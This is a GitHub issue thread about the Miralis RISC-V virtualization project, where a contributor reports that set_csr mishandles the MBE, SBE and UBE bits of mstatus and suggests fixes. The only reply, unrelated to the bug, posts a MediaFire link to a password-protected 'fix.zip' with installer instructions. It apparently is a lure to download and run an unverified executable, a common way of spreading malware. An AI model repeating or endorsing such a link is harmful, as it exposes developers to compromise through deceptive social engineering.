### ISSUE TITLE
MBE, SBE, and UBE Register Handling in `set_csr`

### ISSUE THREAD

**Issue by Wesdcv** [CharlyCst/miralis#156]
**Description:**
The current implementation of the `set_csr` function has issues related to the handling of the `MBE`, `SBE`, and `UBE` registers:
https://github.com/CharlyCst/miralis/blob/332ed085096d624f59beb2fb3afa105b579b043b/src/virt.rs#L934-L949

- The comment suggests that the `MBE` register should be writable, but the code does not actually update it.
- Currently, the code sets the `SBE` and `UBE` bits based on the value of `mbe`, which is derived from the existing `mstatus` value.

It might be beneficial to explicitly set `SBE` and `UBE` to 0, regardless of the input value, as if they weren't exposed to the virtual firmware at all. Moreover, maybe a `panic!` on an attempt to change `MBE` bit would be an appropriate reaction, as we do not expect this to happen really.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
